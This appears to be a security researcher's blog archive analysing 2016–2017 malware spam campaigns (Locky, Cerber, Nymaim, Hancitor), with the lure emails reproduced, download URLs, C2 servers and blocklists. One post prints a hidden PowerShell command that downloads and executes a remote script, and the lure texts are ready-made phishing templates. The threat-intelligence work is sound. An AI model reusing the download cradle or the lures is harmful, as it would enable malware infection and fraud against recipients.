Sponsored by..

Showing posts with label Malware. Show all posts
Showing posts with label Malware. Show all posts

Monday, 20 March 2017

More highly personalised malspam using hijacked domains

Following on from this spam some weeks ago, another one comes in using a broadly similar technique of including the potential victim's real home address while using apparently hijacked infrastructure (although in this case the hijacking isn't so elaborate).

From: customerservice@newshocks.com [mailto:customerservice@newshocks.com]
Sent: 15 March 2017 18:23
Subject: [Redacted] Your order 003009 details




Hello [redacted],
We are delighted to confirm details of your recent order 003009. We will email you again as soon as the items you have chosen are on their way to you.
If you have an online account with us, you can log in here to see the current status of your order.
You will receive another e-mail from us when we have despatched your order.
Information on order 003009 status here
All prices include VAT at the current rate. A full VAT receipt will be included with your order.
Delivery Address:

[Name and address redacted]

If you have any questions, or something about your order isn't right, please contact us. Or you can simply reply to this e-mail.
Best regards and many thanks,

Contact Us Opening Times Delivery Options Returns Policy Privacy Policy Terms & Conditions


The newshocks.com domain used in the "From" field matches the sending server of rel209.newshocks.com (also mail.newshocks.com) on 185.141.164.209. This appears to be a legitimate but unused domain belonging to a distributor of car parts.

The link in the email goes to clipartwin.com/customers/customer-status-003009-verified which is currently 404ing so I can't tell what the payload is, although the previous payload appears to be Ramnit or similar. This is using another hijacked but apparently legitimate web server.

I don't know where the data has leaked from, but in this case the victim had lived at the address for the past four years.. so the leak cannot be ancient. If you have seen something similar or have an idea of where the data came from, please leave a comment below.


Wednesday, 15 February 2017

Malware spam: "RBC - Secure Message" / service@rbc-secure-message.com

This fake banking email leads to some sort of malware:



From:    RBC - Royal Bank [service@rbc-secure-message.com]
Date:    15 February 2017 at 17:50
Subject:    RBC - Secure Message
Signed by:    rbc-secure-message.com


Secure Message Secure Icon
This is an automated message send by Royal Bank Secure Messaging Server. To ensure both you and the RBC Royal Bank comply with current legislation, this message has been encrypted. Please check attached documents for more information.

Note: You should not store confidential information unless it is encrypted.
CONFIDENTIALITY NOTICE:The contents of this email message and any attachments are intended solely for the addressee(s)and may contain confidential and/or privileged information and may be legally protected from disclosure. If you are not the recipient of this message or their agent, or if this message has been addressed to you in error, please immediately alert the sender by reply email and then delete this message and any attachments. If you are not the recipient, you are hereby notified that any use, dissemination, copying, or storage of this message or its attachments is strictly prohibited.


RBCSecureMessage.doc
44K



Attached is a file RBCSecureMessage.doc which contains some sort of macro-based malware. It displays the following page to entice victims to disable their security settings.



Automated analysis is inconclusive [1] [2].  The domain rbc-secure-message.com is fake and has been registered solely for this purpose of malware distribution. In all the samples I saw, the sending IP was 64.91.248.146 (Liquidweb, US) but it does look like all these IPs in the neighbourhood are involved in the same activity:

64.91.248.137
64.91.248.146
64.91.248.148
64.91.248.150

I recommend you block 64.91.248.128/27 at your email gateway to be sure.





Highly personalised malspam making extensive use of hijacked domains

This spam email contained not only the intended victim's name, but also their home address and an apparently valid mobile telephone number:

Sent: 14 February 2017 13:52
To: [redacted]
From: <customer@localpoolrepair.com>
Subject: Mr [Redacted] Your order G29804772-064 confirmation


Dear Mr [redacted],

Thank you for placing an order with us.

For your reference your order number is G29804772-064.

Please note this is an automated email. Please do not reply to this email.

Get your order G29804772-064 details

Your order has been placed and items in stock will be sent to the address shown below. Please check all the details of the order to ensure they are correct as we will be unable to make changes once the order has been processed. You will have been notified at the point of order if an item is out of stock already with expected delivery date.

Delivery Address
[address redacted]
[telephone number redacted]

Delivery Method:
Standard Delivery


Your Order Information
Prices include VAT at 20%


Customer Service Feedback
We are always working to improve the products and service we provide to our customers - we do this through a continual review of the product range, and ongoing training of our Customer Service Team. We continually strive to improve our levels of service and we welcome feedback from our customers regarding your buying experience and the product you receive.

Feefo Independent Reviews
21 days after your purchase, you will receive an email from the independent feedback company Feefo. It takes less than a minute to complete and we'd really appreciate your feedback!


IMPORTANT INFORMATION ABOUT YOUR ORDER

Delivery

Order Tracking
Once your order has left our warehouse we will email you to confirm that the items have been shipped and include tracking details of the parcel so that you may track delivery progress directly with our courier company.

Stock Availability
On very rare occasions not every item will be available when we come to pack and despatch your order. If this is the case you will receive an email from us letting you know which items are affected and an expected delivery time.

Product Returns
All items purchased are covered by our customer friendly returns policy. Please visit for full details.
Thank you for placing your order with us. We really appreciate your custom and will do everything within our power to ensure you get the very best of service.

The data in the spam was identifiable as being a few years old. The intended victim does not appear on the haveibeenpwned.com database. My assumption is that this information has been harvested from an undisclosed data breach.

I was not able to extract the final payload, however the infection path is as follows:

http://bebracelet.com/customerarea/notification-processing-G29804772-064.doc
--> http://customer.abudusolicitors.com/customerarea/notification-processing-G29804772-064.doc
--> https://customer.affiliate-labs.net/customerarea/notification-processing-G29804772-064.zip

This ZIP file actually contains a .lnk file with the following Powershell command embedded in it:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hidden -nop -ep bypass -nologo -c IEX ((New-Object Net.WebClient).DownloadString('http://cristianinho.com/lenty/reasy.ps1'));

I couldn't get a response from the server at cristianinho.com [5.152.199.228 - Redstation, UK], this looks like a possibly legitimate but hijacked domain that uses nameservers belonging to Namecheap. But that's not the only Namecheap connection, because the two "customer" subdomains are also using Namecheap hosting (for the record the subdomains are hosted on - 185.130.207.37 and 185.141.165.204 which is Host1Plus, UK / Digital Energy Technologies, DE).

Three connection to Namecheap is worrying, and certainly we've seen hijacking patterns involving other domain registrars. Or it could just be a coincidence..

The email originated from mx119.argozelo.info on 188.214.88.119 (Hzone, Romania). Just on a hunch, I checked the domain argozelo.info and it appears to be a wholly legitimate site about a Portuguese village, registered at GoDaddy hosted on Blogger. So why does it need a dedicated mail server?

Well.. this particular rabbit hole goes a little deeper. mx119 gives a clue that there might be more than one mailsever, and indeed there are 34 of the critters name mx110.argozelo.info through to mx143.argozelo.info hosted on 188.214.88.110 through 188.214.88.142. But according to Wikipedia, Argozelo only has about 700 inhabitants, so it seems unlikely that they'd need 34 mailservers in Romania.

So, my guess is that argozelo.info has also been hijacked, and hostnames set up for each of the mailservers. But we're not quite finished with this rabbit hole yet. Oh no.

What caught my eye was a mailserver on 188.214.88.110 (the same as mx110.argozelo.info) named mail.localpoolrepair.com which certainly rang a bell because the email was apparently from customer@localpoolrepair.com - yeah, OK.. the "From" in an email can be anything but this can't be a coincidence.

localpoolrepair.com appears to be a legitimate but unused GoDaddy-registered domain, hosted at an Athenix facility in the US. So why is there a mailserver in a Romanian IP block? A DIG at the records for this domain are revealing:

 Query for localpoolrepair.com type=255 class=1
  localpoolrepair.com SOA (Zone of Authority)
        Primary NS: dns.site5.com
        Responsible person: hostmaster@site5.com
        serial:2017021207
        refresh:3600s (60 minutes)
        retry:3600s (60 minutes)
        expire:604800s (7 days)
        minimum-ttl:3600s (60 minutes)
  localpoolrepair.com A (Address) 143.95.232.95
  localpoolrepair.com MX (Mail Exchanger) Priority: 10 mail.localpoolrepair.com
  localpoolrepair.com NS (Nameserver) dns2.site5.com
  localpoolrepair.com NS (Nameserver) dns.site5.com
  localpoolrepair.com TXT (Text Field)
    v=spf1 ip4:188.214.88.110/31 ip4:188.214.88.112/28 ip4:188.214.88.128/29 ip4:188.214.88.136/30 ip4:188.214.88.140/31 ip4:188.214.88.142/32  ~all
So.. the SPF records are valid for sending servers in the 188.214.88.110 through 188.214.88.142 range. It looks to me as if localpoolrepair.com has been hijacked and these SPF records added to it.

So we have hijacked legitimate domains with presumably a neutral or good reputation, and we have valid SPF records. This means that the spam will have decent deliverability. And then the spam itself addresses the victim by name and has personal details presumably stolen in a data breach. Could you trust yourself not to click the link?

Recommended blocklist (email)
188.214.88.0/24

Recommended blocklist (web)
5.152.199.228
185.130.207.37
185.141.165.204




Thursday, 19 January 2017

Malware spam: "The Insolvency Service" / "Investigations Inquiry Notification" / chucktowncheckin.com / chapelnash.com

This malware spam in unusual in many respects. The payload may be some sort of ransomware [UPDATE: this appears to be Cerber].

From: The Insolvency Service [mailto:service@chucktowncheckin.com]
Sent: 19 January 2017 12:22
Subject: EGY 318NHAR12 - Investigations Inquiry Notification



Company Investigations Inquiry
Informing You that we have received appeal regarding your company which indicates corporate misconduct.
Your Inquiry Number: 84725UPTN583
As part of this occasion we have made our own background investigation and if it occurs to be in the public interest, we can apply to the court to wind up the company and stop it trading.
Also if the performance of the director(s) who run the company is questionable enough, we can commence proceedings to disqualify them from governing a limited company for a time span up to 15 years.
FURTHER CASE DATA
The investigation can give us information that we can transmit to another regulatory body that has more suitable powers to deal with any concerns the investigation uncovers.
Help Cookies Contact Terms and conditions Rhestr o Wasanaethau Cymraeg
Built by the Government Digital Service
All content is available under the Open Government Licence v3.0, except where otherwise stated   
© Crown copyright

Sample subjects are:

LSV 354EMPU31 -  Investigations Inquiry Reminder
JXI 647TESR39 -  Investigations Inquiry Reminder
SHV 622WYXP68 -  Investigations Inquiry Notice
QPY 661APWZ41 -  Investigations Inquiry Notice
FHF 338SYBV85 -  Investigations Inquiry Notice
EGY 318NHAR12 -  Investigations Inquiry Notification
IZJ 296CNWP92 -  Investigations Inquiry Notice

All the senders I have seen come from the chucktowncheckin.com domain. Furthermore, all of the sending servers are in the same /24:

194.87.216.87
194.87.216.62
194.87.216.40
194.87.216.43
194.87.216.3
194.87.216.7
194.87.216.80

All the servers have names like kvm42.chapelnash.com in a network block controlled by Reg.ru in Russia.

The link in the email goes to some hacked WordPress site or other, then ends up on a subdomain of uk-insolvencydirect.com e.g. 2vo4.uk-insolvencydirect.com/sending_data/in_cgi/bbwp/cases/Inquiry.php - this is a pretty convincing looking page spoofing the UK government, asking for a CAPTCHA to download the files:


Entering the CAPTCHA downloads a ZIP file (e.g. 3d6Zy.zip) containing a malicious Javascript (e.g. Inquiry Details.js) that looks like this [Pastebin].

Hybrid Analysis of the script is rather interesting, not least because it performs NSLOOKUPs against OpenDNS servers (which is a really weird thing to do give that OpenDNS is a security tool).

The script downloads a component from www.studiolegaleabbruzzese.com/wp-content/plugins/urxwhbnw3ez/flight_4832.pdf and then drops an EXE with an MD5 of e403129a69b5dcfff95362738ce8f241 and a detection rate of 5/53.

Narrowing the Hybrid Analysis down to just the dropped EXE, we can see these peculiar OpenDNS requests as the malware tries to reach out to:

soumakereceivedthiswith.ru (176.98.52.157 - FLP Sidorenko Aleksandr Aleksandrovich, Russia)
sectionpermiathefor.ru (151.0.42.255 - Online Technologies, Ukraine)
programuserandussource.ru (does not resolve)
maytermsmodiall.ru (does not resolve)

It isn't exactly clear what the malware does, but you can bet it is Nothing Good™.

I recommend that you block email traffic from:

194.87.216.0/24

and block web traffic to

uk-insolvencydirect.com
studiolegaleabbruzzese.com
176.98.52.157
151.0.42.255



Thursday, 15 December 2016

Malware spam: "Payment Processing Problem" leads to Locky

This fake financial spam leads to Locky ransomware:

From:    Juliet Langley
Date:    15 December 2016 at 23:17
Subject:    Payment Processing Problem

Dear [redacted],

We have to inform you that a problem occured when processing your last payment (code: 3132224-M, $789.$63).
The receipt is in the attachment. Please study it and contact us.


-
King Regards,
Juliet Langley

The name of the sender will vary, as will the reference number and dollar amounts. Attached is a ZIP file with a name somewhat matching the reference (e.g. MPay3132224.zip) containing in turn a malicious Javascript with a name similar to ~_AB1C2D_~.js.

My trusted source says that the scripts download a component from one of the following locations:

028cdxyk.com/mltxgc1
1688daigou.com/csuix
2lazy4u.de/ca4yq
adv-tech.ru/7p1jia
allan.multimediedesignerskive.dk/pohtr8mwl
amaniinitiative.org/ubaupn
artcoredesign.com/9ihg6by
atelier-coccolino.com/cvpphnaf7o
auto-zakaz.com.ua/phwcg
bantiki.me/hzzgidch
bikebrowse.com/qap3je2
blueprint-dsg.com/dtr22
bvntech.com/amrwwxei
chonamyoung.com/9vsdld
cprsim.com/h9o3msx
dealspari.com/r2jvx5h6kc
demo.ahost5.ru/dhvzqqbo
demo.pornuha4you.com/lba7ajvti
deutsch.awardspace.info/0zetkhmp
dicksmacker.com/qq4ctnrgc
dryerventexpress.com/pnpafot9g
elevationmusic.de/6gcg6
e-studiz.com/hn0hl7i
formatwerbung.de/axxlilgd
gieslerdavies.com/cjhwnit
goldenarms.myjino.ru/3wn40qkg
gwerucity.org.zw/a3fsqhu9od
happyfeet.de/7rebctpqn5
hho68.com/hbowe
honestflooring.com/85i95u6vd
houssiere.daniel.formations-web.alsace/npqddd8b
infinitecorp.ca/to7jp7
kawagebook.com/5cbwdd5hap
kayamuh.sarf.com.tr/nou0chc
ledticket.com/pbmcdnx5rj
lucapotenziani.com/zjtguxf
mainlinecarriers.co.tz/ycj7o
martawyczynska.com/ilfvn
mbdvacations.com/ou8kkem
movewithgrace.ca/r8omwc
obccllc.com/tze5um3hh
old.strommarnas.se/yazezuw7og
seven-cards.com/xe2llygi
spikaflora.ru/zyubd6mlb
store.elixe.net/jltuvjpcsh
test1.zrise.top/isk90e
testlife.ruyigou.com/pv2ryezg7
theexcelconsultant.com/vp9u7tpa
thezenatwork.com/yd2c49vg0
topstoneisland.com/ud4jqd
tunca.bel.tr/uo3jnqkgxn
ustadhanif.com/q0w93lkrvp
www.boldrini.org.br/csneth51
www.chocolaterie-servant.com/1l38y2p
www.englishworld.it/w6ynmr
www.kottalgenealogy.com/vkwf5rll0s
www.sapol.it/ou8e1ftep
zapotech.com/sqagj4
zhongguanjiaoshi.com/mklu7

The malware then phones home to the following locations:

185.129.148.56/checkupdate (MWTV, Latvia)
178.209.51.223/checkupdate [hostname: 454.SW.multiservers.xyz] (EDIS, Switzerland)
37.235.50.119/checkupdate [hostname: 454.2.SW.multiservers.xyz] (EDIS, Switzerland)


Recommended blocklist:
185.129.148.0/24
178.209.51.223
37.235.50.119

Malware spam: "Amount Payable" leads to Locky

This fake financial spam leads to Locky ransomware:

From:    Lynn Drake
Date:    15 December 2016 at 09:55
Subject:    Amount Payable

Dear [redacted],
The amount payable has come to $38.29. All details are in the attachment.
Please open the file when possible.


-
Best Regards,
Lynn Drake
The name of the sender will vary, although the dollar amount seems consistent in all the samples I have seen. Attached is a file with a name similar to doc_6937209.zip which contains an apparently randomly-named script in a format similar to ~_ZJR8WZ_~.js. The highly obfuscated script of one sample can be seen here. Typical detection rates for the script are around 16/54.

There are many different scripts, downloading a component from one of the following locations (thanks to my usual reliable source):

0668.com/k5bhgn
250sb.com./jynvmx
addwords.com.tr/aah6qmhv
anti-dust.ru/7k6cp
asdream.pl/gbbs1c
atio.li/exjik
bappeda.dharmasrayakab.go.id/dlhalychp
braindouble.com/uycx51ix
buhoutserts.ru/ufdazc6vv
casino-okinawa.com/ejguf
catherineduret.ch/5qpqi5ezp
chinaxw.org/xw1ju7y6zc
chungcuvinhomemydinh.com/6dvjasf
crolic88.myjino.ru/1ddig
demo.shispare.com/bvsjq
environment.ae/0od5hn
forbrent.com/h9kqgq
fyd123.cn/kib6h2d9ga
groupeelectrogeneservice.com/eefpeywf9z
hedefosgb.com/dpyzsb6u
hlonline.kentucky.com/i7z78
innercityarts.squaremdesign.com/dyo1w7
jianhu365.com/z9puqdj2eu
malamut.org/gizb2zq
obaloco.com.br/67mfj
peopleprofit.in/pyihdg
roman64.humlak.cz/7bnisgf
rulebraker.ru/zsw4cnf9o
scaune.qmagazin.ro/5hktu4h
slankmethode.nl/4zzq1am
subys.com/mjguriv80
szwanrong.com/x5qxzpjsi
tecnomundo.uy/a8rnlgzv
test1.giaiphaponline.org/0ytdjs1
test.sousouyo.com/feaetpnuee
theamericanwake.com/xw1ju7y6zc
travelinsider.com.au/mwaefb4b
trietlong.net/heyus
tx318.com/kqe4ca
ucbus.net/usdxqqt6
u-niwon.com/kmjg6j9ske
vaaren.dk/ogcz6ys0d
viscarci.com/wyqs6353
walkonwheels.net.au/qmd1uu
wdcd999.com/lm5z2snyqn
web-shuttle.in/eeo9oc
windshieldrepairvancouver.ca/qcp8k7
wiselysoft.com/qcymgbug7
wszystkodokuchni.pl/sl5yko7
wudiai.com/mc3hnwd
www.espansioneimmobiliare.com/akktnck
www.myboatplans.net/6d7ukeco6
wx.utaidu.com/1eybujbru
xlr8services.com/n970foumf
xn--k1affefe.xn--p1ai/8wzzjk24u
youspeak.pt/liowrtxs
yukngobrol.com/h7sfu
zhiyuw.com/qfbdcvrul
zwljfc.com/ld1pvjozu
zzzort10xtest123.com/nin5k3bwo

According to this Malwr analysis, a DLL is dropped with a detection rate of 18/55.  This Hybrid Analysis shows the Locky infection clearly and identifies some C2s, combining this with another source gives the following list of C2 servers:

86.110.117.155/checkupdate (Rustelekom, Russia)
185.129.148.56/checkupdate (MWTV, Latvia)
185.17.120.166/checkupdate (Rustelekom, Russia)


MWTV is a known bad host, so I recommend blocking the entire /24.

Recommended blocklist:
86.110.117.155
185.129.148.0/24
185.17.120.166


Monday, 12 December 2016

Malware spam: "New(910)" leads to Locky

This spam leads to Locky ransomware:

From:    Savannah [Savannah807@victimdomain.tld]
Reply-To:    Savannah [Savannah807@victimdomain.tld]
Date:    12 December 2016 at 09:50
Subject:    New(910)

Scanned by CamScanner


Sent from Yahoo Mail on Android

The spam appears to come from a sender within the victim's own domain, but this is just a simple forgery. The attachment name is a .DOCM file matching the name in the subject. Automated analysis [1] [2] indicates that it works in a similar way to this other Locky ransomware run today.

Malware spam: "Invoice number: 947781" leads to Locky

This fake financial spam comes from multiple senders and leads to Locky ransomware:


From:    AUTUMN RHINES
Date:    12 December 2016 at 10:40
Subject:    Invoice number: 947781

Please find attached a copy of your invoice.


Tel: 0800 170 7234
Fax: 0161 850 0404

For all your stationery needs please visit Stationerybase.
The name of the sender varies, as does the fake invoice number. Attached is a .DOCM file with a filename matching that invoice number. Typical detection rates for the DOCM file are 13/56.

Automated analysis of a couple of these files [1] [2] [3] [4] show the macro downloading a component from miel-maroc.com/874ghv3  (there are probably many more locations). A DLL is dropped with a current detection rate of 11/57.

All those analyses indicate that this is Locky ransomware (Osiris variant), phoning home to:

176.121.14.95/checkupdate (Rinet LLC, Ukraine)
88.214.236.218/checkupdate (Overoptic Systems, UK / Russia)
91.219.31.14/checkupdate (FLP Kochenov Aleksej Vladislavovich aka uadomen.com, Ukraine)


Recommended blocklist:
176.121.14.95
88.214.236.218
91.219.31.14




Friday, 9 December 2016

Malware spam: "Firewall Software" leads to Locky

This spam appears to come from multiple senders and leads to Locky ransomware:

From:    Herman Middleton
Date:    9 December 2016 at 07:40
Subject:    Firewall Software

Hey [redacted], it is Herman. You've asked me to order new firewall software for our office computers.
Done and ready. Here, in the attachment, is the full invoice of the software counteragent.

Please check it out.


--
King Regards,
Herman Middleton
IT Support Manager
Attached is a ZIP file with a name like f_license_5330349.zip which contains a randomly named .js script which is very highly obfuscated.

The Hybrid Analysis and Malwr report show that the script analysed downloads a component from welte.pl/mupze (there will probably be dozens of other locations) and appears to drop a DLL with a detection rate of 4/56. That Hybrid Analysis also detections C2 traffic to:

107.181.187.97/checkupdate [hostname: saluk1.example.com] (Total Server Solutions, US)
51.254.141.213/checkupdate (OVH, France)


It's worth mentioning perhaps that other Locky C2 servers seen in the past 12 hours are as follows:

91.142.90.46/checkupdate [hostname: mrn46.powerfulsecurities.com] (Miran, Russia)
195.123.209.23/checkupdate [hostame: prujio.com] (Layer6, Latvia)
185.127.24.247/checkupdate [hostname: free.example.com] (Informtehtrans, Russia)
176.121.14.95/checkupdate (Rinet LLC, Ukraine)
185.46.11.236/checkupdate (Agava, Russia)
178.159.42.248/checkupdate (Dunaevskiy Denis Leonidovich / Zomro, Ukraine)


Although some of these are from different sub-groups of Locky pushers, let's stick them all together for the sake of convenience. Note that there are a at least a couple of bad /24 blocks in there.

Recommended blocklist:
51.254.141.213
91.142.90.46
107.181.187.97
176.121.14.95
178.159.42.248
185.46.11.0/24
185.127.24.247
195.123.209.0/24


Monday, 5 December 2016

Malware spam: "Shipping status changed for your parcel # 1996466" / ups@ups-service.com

This fake UPS spam has a malicious attachment:

From:    UPS Quantum View [ups@ups-service.com]
Date:    5 December 2016 at 17:38
Subject:    Shipping status changed for your parcel # 1996466

Your parcel has arrived, but we were unable to successfully deliver it because no person was present at the destination address.

There must be someone present at the destination address, on the delivery day, to receive the parcel.

Shipping type: UPS 3 Day Select
Box size: UPS EXPRESS BOX
Date : Nov 14th 2016
You can reschedule the delivery over the phone, but you will have to confirm the information on the delivery invoice.

The delivery invoice  can be downloaded from our website :
https://wwwapps.ups.com/WebTracking/view_invoice?id=1996466&delivery_date=1204&account=[redacted]

 
Thank you for shipping with UPS

Copyright © 1994-2016 United Parcel Service of America, Inc. All rights reserved.
The link in the email actually goes to a URL vantaiduonganh.vn/api/get.php?id= plus a Base 64 encoded part of the URL (e.g. aGVscGRlc2tAZmJpLmdvdg==) and it downloads a Word document with the recipients email address included in it. This type of malware is typically seen using hacked but legitimate Vietnamese sites for this stage in the infection chain.

This DOC file contains a malicious macro, the Malwr report indicates that it downloads components from:

parkovka-rostov.ru/inst.exe
stela-krasnodar.ru/wp-content/uploads/pm22.dll

Those two locations are legitimate hacked sites. This has a detection rate of 7/56 plus a DLL with a detetion rate of 37/56. The malware appears to be Hancitor / Pony / Vawtrak, phoning home to:

cothenperci.ru/borjomi/gate.php
madingtoftling.com/ls5/forum.php


Both of these are hosted on the same IP address of 185.31.160.11 (Planetahost, Russia). The following malicious domains are also hosted on the same IP:

atiline.ru
vkplitka.ru
teunugtin.ru
cyrebsedri.ru
verarsedme.ru
cothenperci.ru
undorrophan.ru
verciherthan.ru
cypegeding.com
ferabrighrob.com
nastylgilast.com
madingtoftling.com


Recommended blocklist:
185.31.160.11
parkovka-rostov.ru
stela-krasnodar.ru


Malware spam: "Please Consider This" leads to Locky

This fake financial spam leads to malware:

From:    Aimee Guy
Date:    5 December 2016 at 13:32
Subject:    Please Consider This

Dear [redacted],

Our accountants have noticed a mistake in the payment bill #DEC-5956047.
The full information regarding the mistake, and further recommendations are in the attached document.

Please confirm the amount and let us know if you have any questions.

Attached is a ZIP file with a name somewhat matching the reference in the email, containing a malicious VBS script with a filename made up in part of the date.

The scripts download another component from one of the following locations, according to my usual reliable source:

admin3.rtaf.mi.th/8765r
buhoutserts.ru/8765r
chanet.jp/8765r
guardian-angels-diva.de/8765r
haibeiwuliu.com/8765r
hzxihe.com/8765r
linghangcj.com/8765r
markettv.ro/8765r
maycongtrinhduylong.com/8765r
natashacollis.com/8765r
ruifengweb.com/8765r
rulebraker.ru/8765r
szwanrong.com/8765r
temai1.com/8765r
travelinsider.com.au/8765r
tx318.com/8765r
ucbus.net/8765r
u-niwon.com/8765r
valuationssa.com.au/8765r
vipseal.de/8765r
viscarci.com/8765r
wdcd999.com/8765r
wiky.net/8765r
windshieldrepairvancouver.ca/8765r
wiselysoft.com/8765r
wishingwellhosting.com.au/8765r
wszystkodokuchni.pl/8765r
wudiai.com/8765r
xlr8services.com/8765r
xn--pasaer-spb.pl/8765r
youspeak.pt/8765r
zhiyuw.com/8765r
zwljfc.com/8765r

It drops a payload with an MD5 of 529789f27eb971ff822989a5247474ce and a current detection rate of just 1/54. The malware then phones home to the following locations:

91.142.90.61/information.cgi [hostname: smtp-server1.ru] (Miran, Russia)
195.19.192.99/information.cgi (EkaComp, Russia)


These IPs were also used in this earlier attack.

Recommended blocklist:
185.82.217.28
91.142.90.61
195.19.192.99


Malware spam: "Emailing: _9376_924272" / "No subject" leads to ".osiris" Locky.

This spam comes in a few different variants, and it leads to Locky ransomware encrypting files with an extension ".osiris"

The more word version comes from random senders with a subject like _9376_924272 or some other randomly-numbered sequence. Attacked to that is an XLS file of the same name and it includes this body text:

Your message is ready to be sent with the following file or link
attachments:

  _9376_924272


Note: To protect against computer viruses, e-mail programs may prevent
sending or receiving certain types of file attachments.  Check your e-mail
security settings to determine how attachments are handled.
The second version has no body text and the subject No subject or (No subject). The XLS file is named in a format incorporating the date, e.g. 2016120517082126121298.xls

The macro in the malicious Excel file downloads a component from on of the following locations (according to my usual reliable source):

aetech-solutions.com/87t34f
analypia.com/87t34f
angiebundy.com/87t34f
antelope.co.uk/87t34f
cafe-bg.com/87t34f
dachbud.slask.pl/87t34f
davetoll.com/87t34f
dcareug.com/87t34f
deminico.com/87t34f
griptrix.com/87t34f
kamico.net/87t34f
kelbud.pl/87t34f
ktlelektro.cz/87t34f
laferwear.com/87t34f
masterstudio.org/87t34f
milano.koscian.pl/87t34f
paradiseinfiji.com/87t34f
rongdaistudio.com/87t34f
rsaf.cz/87t34f
sevenseas.lk/87t34f
soulscooter.com/87t34f
sparky.com/87t34f
ssivendorinformation.com/87t34f
sublimeshop.co.uk/87t34f
subys.com/87t34f
tppsk.marcinczaja.pl/87t34f
tybor.hu/87t34f
waat.co.uk/87t34f
www.riojadental.com/87t34f
www.stavros.ca/87t34f
zealcon.com/87t34f

You can see some of the things done in these two Malwr reports [1] [2]. The Locky ransomware dropped then phones home to one of the following locations:

185.82.217.28/checkupdate [hostname: olezhkakovtony11.example.com] (ITL, Bulgaria)
91.142.90.61/checkupdate (Miran, Russia)
195.19.192.99/checkupdate (OOO EkaComp, Russia)


Recommended blocklist:
185.82.217.28
91.142.90.61
195.19.192.99




Tuesday, 29 November 2016

Fake eFax spam uses hacked Sharepoint to spread malware

This fake fax leads to a malicious ZIP file:

From:    eFax [message@inbound-efax.org]
Date:    29 November 2016 at 16:01
Subject:    eFax message from "61 2 97855412" - 2 page(s)


Fax Message

You have received a 2 page fax at 11/29/2016 5:01:13 PM.

* The reference number for this fax is syd1_did12-5405183509-083357256-5.

Click here to view this fax message.

Please visit www.efax.com/en/online_fax_FAQ if you have any questions regarding this message or your service.

Thank you for using the eFax service!
Home     Contact     Login
Powered by j2

© 2012 j2 Global Communications, Inc. All rights reserved.
eFax® is a registered trademark of j2 Global Communications, Inc.

This account is subject to the terms listed in the eFax® Customer Agreement.


The link in the email goes to a hacked Sharepoint account, in this case:

https://supremeselfstorage-my.sharepoint.com/personal/andrew_supremeselfstorage_com_au/_layouts/15/guestaccess.aspx?guestaccesstoken=GTQPc%2brKLAsKHba4nXtvl0hXrBsUmCUxoYGuu9msk0U%3d&docid=0c4b96dfd3319496a8feb1a56d88de679&rev=1

It seems to belong to a legitimate company, but maybe one that has suffered an Office 365 compromise.

The ZIP file it leads to is named Fax_11292016.zip (there may be other versions) containing two identical scripts named

Fax_11292016_page1.js
Fax_11292016_page2.js

that look like this. Hybrid Analysis of the script indicates this is Nymaim, downloading a component from:

siliguribarassociation.org/images/staffs/documetns.png

A malicious EXE is dropped with an MD5 of bdf952b2388bf429097b771746395a4c and a detection rate of 9/56. The malware then phones home to:

stengeling.com/20aml/index.php

The domain stengeling.com appears to have been created for this malware and has anonymous registration details. It is apparently multihomed on the following IPs:

4.77.129.110
18.17.224.92
31.209.107.100
37.15.90.12
43.132.208.7
45.249.111.213
52.61.200.235
61.25.216.8
67.25.164.206
74.174.194.169
88.214.198.162
92.74.29.236
111.241.115.90
115.249.171.24
119.71.196.177
135.55.94.211
143.99.241.18
147.89.60.135
156.180.11.60
162.74.9.51
168.227.171.254
176.114.21.171
184.131.179.44
207.77.174.212

Each of those IPs appears to be a hacked legitimate host, with a high turnover of IPs. Those IPs appear to be associated with the following domains that may be worth blocking:

butestsis.com
sievecnda.com
specsotch.com
crileliste.com
stengeling.com


Malware spam: "Please find attached a XLS Invoice 378296" / creditcontrol@somecompany.com / Ansell Lighting

This fake financial spam comes with a malicious attachment, purporting to come from Ansell Lighting:

Subject:     Please find attached a XLS Invoice 378296
From:     creditcontrol@potomachealthcare.com (creditcontrol@potomachealthcare.com)
Date:     Tuesday, 29 November 2016, 10:32

The original message was not completely plain text, and may be unsafe to
open with some email clients; in particular, it may contain a virus,
or confirm that your address can receive spam.  If you wish to view
it, it may be safer to save it to a file and open it with an editor.

Please find attached your Invoice for Goods/Services recently delivered. If you have any questions, then pleasedo not hesitate in contacting us.Karen Lightfoot -Credit Controller, Ansell Lighting, Unit 6B, Stonecross Industrial Park, Yew Tree Way, WA3 3JD. Tel: +44 (0)5216 154 830 Fax: +44 (0)5216 154 830

The email comes from a random creditcontrol@something email address. Attached is a malicious Excel file with a name such as INVOICE.TAM_378296_20161129_886C9EAB6.xls.

My usual reliable source says that the various versions of Excel spreadsheet download a component form one of the following locations:

ayurvedic.by/087gbdv4
pregnancysquare.com/087gbdv4
qiqi-store.com/087gbdv4
roberttrocina.com/087gbdv4
satherm.pt/087gbdv4
sayvir.com/087gbdv4
secotral.fr/087gbdv4
semeystvo.com.ua/087gbdv4
spookmedia.nl/087gbdv4
sp-tulun.ru/087gbdv4
stocktradex.com/087gbdv4
swkitchens.com.au/087gbdv4
thegarageteam.gr/087gbdv4
tyfastener.com/087gbdv4

The Hybrid Analysis shows that this is Locky ransomware, phoning home to:

185.115.140.210/information.cgi [hostname: nikita.grachev.81.example.com] (Megaserver LLC, Russia)
213.32.90.193/information.cgi [hostname:  sbg.13.vds.abcvg.ovh] (OVH, France)
95.213.195.123/information.cgi (Selectel SPb, Russia)


A DLL is dropped with an MD5 of b46f0fcb0f962f41b5b43725b440dabb and a VirusTotal detection rate of 11/57.

Recommended blocklist:
185.115.140.210
213.32.90.193
95.213.195.123

Friday, 25 November 2016

Malware spam: [Vigor2820 Series] New voice mail message from 014xxxxxxxx on %date%

This fake voicemail spam leads to Locky ransomware and appears to come from within the victim's own domain, but this is just a simple forgery.

Subject:     [Vigor2820 Series] New voice mail message from 01435773591 on 2016/11/25 18:29:39
From:     voicemail@victimdomain.tld
To:     victim@victimdomain.tld
Date:     Friday, 25 November 2016, 12:58

Dear webmaster :
    There is a message for you from 01435773591, on 2016/11/25 18:29:39 .
You might want to check it when you get a chance.Thanks!
The number in the message will vary, but is consistent throughout. Attached is a ZIP file referencing the same number, e.g. Message_from_01435773591.wav.zip which contains a malicious Javascript that looks like this.

This Malwr analysis shows behaviour consistent with Locky ransomware. My usual source tells me that all the download locations for this campaign are:

asrcargo.ru/yr387n3
easylation.com/yr387n3
jackybrith.net/yr387n3
namicg.com/yr387n3
nxarab.net/yr387n3
oyasinsaat.com.tr/yr387n3
